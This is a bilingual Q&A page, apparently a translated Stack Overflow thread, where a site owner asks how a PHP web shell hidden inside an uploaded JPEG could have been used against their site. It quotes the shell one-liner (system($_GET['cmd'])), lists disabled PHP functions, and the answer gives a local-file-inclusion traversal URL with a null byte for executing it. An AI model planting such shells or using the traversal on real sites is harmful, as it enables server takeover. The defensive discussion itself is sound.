我的php网站被上传为图片的代码攻击..? [英] My php site was hacked by codes uploaded as image..?
问题描述
昨天我的网站已经成立。攻击者将index.php文件更改为自己的文件(带有所有荣耀消息和问候语)。我已经通知托管公司这个(我们在专用服务器上运行),就我而言,我正在尝试修复任何似乎是原因的事情,因为我仍然无法指出我们究竟是怎么做到的。服务器遭到攻击,但我认为我发现某些基于脚本的漏洞可能是罪魁祸首。
Yesterday my site was comprised. The attacker changes the index.php file to their own (with all their glory messages and greet). I've notified the hosting company about this (we are running on a dedicated server), and on my part, I'm trying to fix anything that seems to be the cause, cause I'm still unable to point how exactly did our server was attacked, but I think I've found certain script-based loopholes that could possibly be the culprit.
我们的网站有一个图片上传器表单,但所有上传的图片通过使用php getimagesize函数验证它们是否确实是图像文件而不是某些代码。仅当图像类型为IMAGETYPE_GIF或IMAGETYPE_JPEG或IMAGETYPE_PNG时才会接受它们。否则,他们将无法上传文件。但是我发现一个上传的图像文件里面包含一个php脚本!您可以下载此处的图片。这是一个有效的图像文件,但尝试使用任何文本编辑器打开图像,你会在其中找到一个PHP代码:
Our site has an image uploader form, but all uploaded images are verified if they're indeed image file and not some codes by using php getimagesize function. Only if the image type is IMAGETYPE_GIF, or IMAGETYPE_JPEG, or IMAGETYPE_PNG will they be accepted. Else, they won't be able to upload the file. However I found out that one uploaded image file contains a php script inside it! You can download the image here. It's a valid image file, but try opening the image using any text editor and you will find a php code inside it:
<?php
echo "<pre>"; system($_GET['cmd']); echo "</pre>";
?>
例如,图像上传到此位置(www.mysite.com/uploads/picodes。 JPG格式)。请注意文件夹上传的权限是755.攻击者是否有任何方法可以执行系统(或任何其他命令,如passthru,因为我们发现另一个图像具有与上面相同的代码隐藏,但不是系统,它有passthru命令),例如,键入 www.mysite.com/uploads/picodes.jpg?cmd=some命令 ??根据我的知识,它无法完成(真的很感激,如果有人可以证明我错了),除非攻击者可以将jpg文件重命名为php,即便如此,这些代码都隐藏在图像的深处(请参阅里面的图像文本编辑器,以了解我想说的是什么)
For example, the image is uploaded to this location (www.mysite.com/uploads/picodes.jpg). Take note that folder uploads' permission is 755. Is there any way in the world the attacker can execute the system (or any other command such as passthru, since we found out another image has the same code hidden as above, but instead of system, it has passthru command), by just for example, typing www.mysite.com/uploads/picodes.jpg?cmd=some command ?? From my knowledge it can't be done (really appreciate it if someone can prove me wrong), unless the attacker can rename the jpg file to php, and even that, these codes are hidden deep inside the image (please see the image inside text editor to understand what I'm trying to say)
为了注意事项,我已经禁用了这些php函数(exec,passthru,proc_close,proc_get_status,proc_nice,proc_open, proc_terminate,shell_exec,system)通过在php.ini中的disable_functions上添加它们。
For precautions, I've disabled these php functions (exec, passthru, proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,system) by adding them on the disable_functions in php.ini.
无论如何,我仍然认为攻击者不是通过网络获取访问权限,而是通过服务器利用,但我认为我的托管公司不这么认为。
Anyway I still think that the attacker gains access not through web, but through server exploit, but I think my hosting company thinks otherwise.
推荐答案
带有任意PHP代码的图像文件无法通过直接请求来利用,例如 http://www.mysite.com/uploads/image.jpg?cmd=somecode 。
Image file with arbitrary PHP code can't be exploited with direct request to it, e.g. http://www.mysite.com/uploads/image.jpg?cmd=somecode.
仍然,它可以与本地文件包含漏洞一起使用。
Still, it can be used with Local File Inclusion vulnerability.
例如,在index.php中,你使用 include('pages /'。$ _GET [ 'page']。'。php'); ,然后攻击者可以使用PHP代码上传图像,并使用smth执行命令,如下所示: http://www.mysite。 com / index.php?page = .. / upload / image.jpg?cmd = somecode%00
For example, in index.php you use include('pages/' . $_GET['page'] . '.php');, then attacker can upload image with PHP code inside and execute commands with smth like this: http://www.mysite.com/index.php?page=../upload/image.jpg?cmd=somecode%00
UPD:更改了URL中的文件到页面
UPD: changed file in URL to page
这篇关于我的php网站被上传为图片的代码攻击..?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
![此处](\"http://img132.imageshack.us/img132/6365/picodes.jpg\"){kind=link}